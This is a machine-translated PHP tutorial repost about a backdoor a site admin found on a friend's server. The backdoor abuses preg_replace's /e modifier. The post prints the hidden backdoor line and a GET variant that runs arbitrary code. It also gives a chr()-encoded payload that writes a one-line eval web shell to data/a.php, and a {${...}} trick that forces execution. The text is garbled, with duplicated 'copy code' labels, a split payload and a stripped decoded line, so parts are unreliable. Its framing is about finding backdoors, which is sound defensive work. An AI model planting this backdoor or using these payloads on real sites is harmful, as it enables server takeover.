preg_replace hidden backdoor and subsequent exploration_PHP tutorial

WBOY
Release: 2016-07-13 17:10:54
Original
1119 people have browsed it

There are many PHP backdoors, and I have seen and played with Baozi a lot, but when I helped a friend check the server, I found such malicious code.

The thing is like this, using various backdoor search tools on my friend’s website, no PHP Trojan was found. I can’t always find it. Xiao Hei’s tricks are very advanced. Every time I use them

After using it, I always delete the backdoor, but I can still come in every time, but I can’t find where it came in. This is really painful.

Later, I finally found some clues in the logs. Through my analysis, I found that an IP always posted strange data to a certain file. Then a paragraph

After a while, this IP accessed an inexplicable file with a very conspicuous name. It was obviously not a normal system file, but a PHP backdoor. But soon after using the backdoor

was deleted.

Haha, Xiao Hei is very attentive when I meet him.

Then through analysis, it was found that the file discovery code accessed by Xiaohei:

The code is as follows Copy code
 代码如下 复制代码

@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

It’s okay if you see this code, but this is the malicious code and backdoor hidden by Xiaohei. Go covert, basically anything

No anti-virus software can detect it.

preg_replace function prototype:

mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])

Special instructions:

The

/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreferences have been replaced). Tip: Make sure

replacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace()

Wrong.

The above code is for POST to accept data and needs to be tested, which is more troublesome. If it is replaced by GET to obtain data. . .

Example:
 代码如下 复制代码

echo preg_replace("/test/e",$_GET["h"],"jutst test");

The code is as follows Copy code

echo preg_replace("/test/e",$_GET["h"],"jutst test");

If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP

Code execution).

 代码如下 复制代码


 ?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr

(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr

(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr

(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr

(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))

If we want to POST, what will happen if we test and submit the following code?

The code is as follows Copy code

?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112). chr(101).chr
 代码如下 复制代码

fputs(fopen(data/a.php,w),);

(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46 ).chr(112).chr(104).chr (112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60 ).chr(63).chr(112).chr (104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95 ).chr(80).chr(79).chr (83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62 ).chr(39).chr(41).chr(59))
The plaintext corresponding to the ciphertext is:
The code is as follows Copy code
fputs(fopen(data/a.php,w),);

The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.

This is terrifying. . . .

Another difficult example:

View code printing?

Note: Functions enclosed in double quotes will not be executed and replaced.
The code is as follows
 代码如下 复制代码

function test($str)

{

}

echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]);

?>

Copy code

function test($str)

{

}

echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]);

?>

Submit ?h=[php]phpinfo()[/php], will phpinfo() be executed?

Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time

Counted.

Is there any way to make it execute?

Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
 代码如下 复制代码

1 @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed.

Here we need to construct a special variable, 'test("{${phpinfo()}}")' through {${}}, to achieve the effect of allowing the function to be executed

(${phpinfo()} will be interpreted and executed).

echo "{${phpinfo()}}"; phpinfo will be executed successfully. So, please pay attention when looking for backdoors. OK, having said so much and understanding it, the code I gave above:
The code is as follows Copy code
1 @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");
What looks like a normal code is actually an extremely dangerous code, which is quite hidden http://www.bkjia.com/PHPjc/629643.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/629643.htmlTechArticleThere are many PHP backdoors, and Baozi has seen and played with them a lot, but when I helped a friend check the server , unexpectedly found such malicious code. Here’s the thing, my friend’s website...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template